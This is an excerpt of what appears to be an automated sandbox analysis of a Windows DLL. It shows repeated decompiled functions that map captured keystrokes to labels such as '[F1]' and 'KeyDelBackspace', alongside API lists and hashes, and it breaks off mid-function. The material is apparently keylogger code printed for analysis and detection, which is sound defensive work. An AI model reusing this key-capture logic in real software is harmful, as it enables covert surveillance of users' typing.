                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[Arrow Down]
                  • API String ID: 783433895-3022692989
                  • Opcode ID: f45b26b29b61d5e51fb90bdc8d895315599a8a53428478e9d688cd7bca0c64de
                  • Instruction ID: 02fcabc6e8f29592f11b422fe8cf2b1af30d8c93f08c5ed3910a1be214322d5a
                  • Opcode Fuzzy Hash: f45b26b29b61d5e51fb90bdc8d895315599a8a53428478e9d688cd7bca0c64de
                  • Instruction Fuzzy Hash: 9031BEB8B042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE458B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007387(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[End]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[End]
                  • API String ID: 783433895-3192008669
                  • Opcode ID: 8be033b71e6cc91fa7183bd242525b69fd42a60ab2c77db8e333b15f6c02985c
                  • Instruction ID: 877a2d7053b44eef148fc6c70e56ab44244d2a6eb94c84edd50b79bcd33e9510
                  • Opcode Fuzzy Hash: 8be033b71e6cc91fa7183bd242525b69fd42a60ab2c77db8e333b15f6c02985c
                  • Instruction Fuzzy Hash: C431C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A6F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E10007398(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F1]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F1]
                  • API String ID: 783433895-641059523
                  • Opcode ID: 64e4913f7c88e1f6cf871e329d884627882b20964cb17dd16a0edd8879f2af3b
                  • Instruction ID: 59f01fadd6c1986280f76c7ec94e26e07e8e794a631d308a07038ad1fc5cdc92
                  • Opcode Fuzzy Hash: 64e4913f7c88e1f6cf871e329d884627882b20964cb17dd16a0edd8879f2af3b
                  • Instruction Fuzzy Hash: 4231C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECA78EE49CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100073A9(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F10]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F10]
                  • API String ID: 783433895-364933614
                  • Opcode ID: 9f166c72ca3fb3b12034e07594ffb6c51ca785a8f37ad7b268c171178664f28e
                  • Instruction ID: 4cdd846a56abf61bb4e4c6fde4f6555a2bc56d43735489f94f76061a9b7946e9
                  • Opcode Fuzzy Hash: 9f166c72ca3fb3b12034e07594ffb6c51ca785a8f37ad7b268c171178664f28e
                  • Instruction Fuzzy Hash: 5931C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F6489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100073BA(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F11]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F11]
                  • API String ID: 783433895-215695535
                  • Opcode ID: ea95564da9a66dc7470533b2786a86451c8797b2579bdf17ac1d53f73ee1c4ab
                  • Instruction ID: ab767402ff5a0ef776935679cf191d8ea99af36a4d9809d38744d6a7013e6ded
                  • Opcode Fuzzy Hash: ea95564da9a66dc7470533b2786a86451c8797b2579bdf17ac1d53f73ee1c4ab
                  • Instruction Fuzzy Hash: 8C31C0B8F042545BF722DB658C85B9F73A9FB882C0F50C0A5F5489720ECA78EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100073CB(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F12]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
                  							E10006DFC( *_t76, _t76, 0x80, _t118 - 0x410, _t112, 0x1000f6d8, _t128);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x410)));
                  						}
                  					}
                  					_t56 =  *(_t118 - 0x20c);
                  					_t129 = _t56;
                  					if(_t129 != 0) {
                  						ToUnicodeEx(_t56,  *(_t118 - 0x208), _t118 - 0x204, _t118 - 0x30c, 0x100, 0, _t112);
                  					}
                  					E100050D8();
                  				}
                  				E10003A34( *_t76, L"KeyDelBackspace");
                  				if(_t129 == 0) {
                  					E10003770(_t76);
                  				}
                  				_pop(_t88);
                  				 *[fs:eax] = _t88;
                  				_push(E100078BE);
                  				return E10003788(_t118 - 0x414, 2);
                  			}

                  APIs
                    • Part of subcall function 100037AC: SysReAllocStringLen.OLEAUT32(1000D0D0,1000CFDC,00000002), ref: 100037C2
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 10007754
                  • ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 100077F8
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 1000784E
                  • MapVirtualKeyW.USER32(0000006E,00000001), ref: 10007871
                  • ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 10007879
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: Unicode$Virtual$AllocString
                  • String ID: KeyDelBackspace$Numpad$[F12]
                  • API String ID: 783433895-670438252
                  • Opcode ID: 0c12ee716339a32b888c429408e51ea20923bef0f46d25eede9ce57d1a8b8c38
                  • Instruction ID: 79f6c1988ebe657b0a26f0600b493b9fd807da5f9602e5f532d1718735006c02
                  • Opcode Fuzzy Hash: 0c12ee716339a32b888c429408e51ea20923bef0f46d25eede9ce57d1a8b8c38
                  • Instruction Fuzzy Hash: 0D31C0B8F042545BF722DB658C45B9F73A9FB882C0F50C0A5F5489720ECAB8EE45CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 80%
                  			E100073DC(intOrPtr* __ebx, void* __ecx, struct HKL__* __edi) {
                  				int _t52;
                  				int _t56;
                  				intOrPtr* _t76;
                  				intOrPtr _t88;
                  				struct HKL__* _t104;
                  				struct HKL__* _t108;
                  				struct HKL__* _t112;
                  				int _t113;
                  				int _t115;
                  				void* _t118;
                  				int _t129;
                  
                  				_t104 = __edi;
                  				_t76 = __ebx;
                  				E100037AC(__ebx, L"[F13]");
                  				E10003A34( *__ebx, 0);
                  				if(0 != 0 &&  *0x1000f6c2 == 1 && E10003B94(0x10008004,  *__ebx) > 0 && E10003B94(L"Numpad",  *__ebx) <= 0) {
                  					E100037AC(__ebx, L"KeyDelBackspace");
                  				}
                  				 *((char*)(_t118 - 1)) = E10006D04();
                  				_t113 = ToUnicodeEx( *(_t118 + 0xc) & 0x0000ffff,  *(_t118 + 0x10) & 0x0000ffff, _t118 - 0x101, _t118 - 0x30c, 0x100, 0, _t104);
                  				if(_t113 <= 0) {
                  					__eflags = _t113;
                  					if(_t113 < 0) {
                  						 *0x1000f6d8 =  *(_t118 + 0xc) & 0x0000ffff;
                  						 *0x1000f6dc =  *(_t118 + 0x10) & 0x0000ffff;
                  						memcpy(0x1000f6e0, _t118 - 0x101, 0x40 << 2);
                  						_t108 = _t104;
                  						_t115 = _t113;
                  						E100050D8();
                  						MapVirtualKeyW(0x6e, 1);
                  						__eflags = _t115;
                  						if(_t115 < 0) {
                  							do {
                  								_t52 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t118 - 0x40c, _t118 - 0x30c, 0x100, 0, _t108);
                  								__eflags = _t52;
                  							} while (_t52 < 0);
                  						}
                  					}
                  				} else {
                  					memcpy(_t118 - 0x20c, 0x1000f6d8, 0x42 << 2);
                  					_t112 = _t104;
                  					E10003A34( *_t76, 0);
                  					if(0 == 0) {
                  						E100038E0(_t76, 0x80, _t118 - 0x30c);
                  						_t128 =  *((char*)(_t118 - 1));
                  						if( *((char*)(_t118 - 1)) == 0) {
                  							E10006D80( *_t76, _t76, 0x80, _t118 - 0x414, _t112, 0x1000f6d8, __eflags);
                  							E100037AC(_t76,  *((intOrPtr*)(_t118 - 0x414)));
                  						} else {
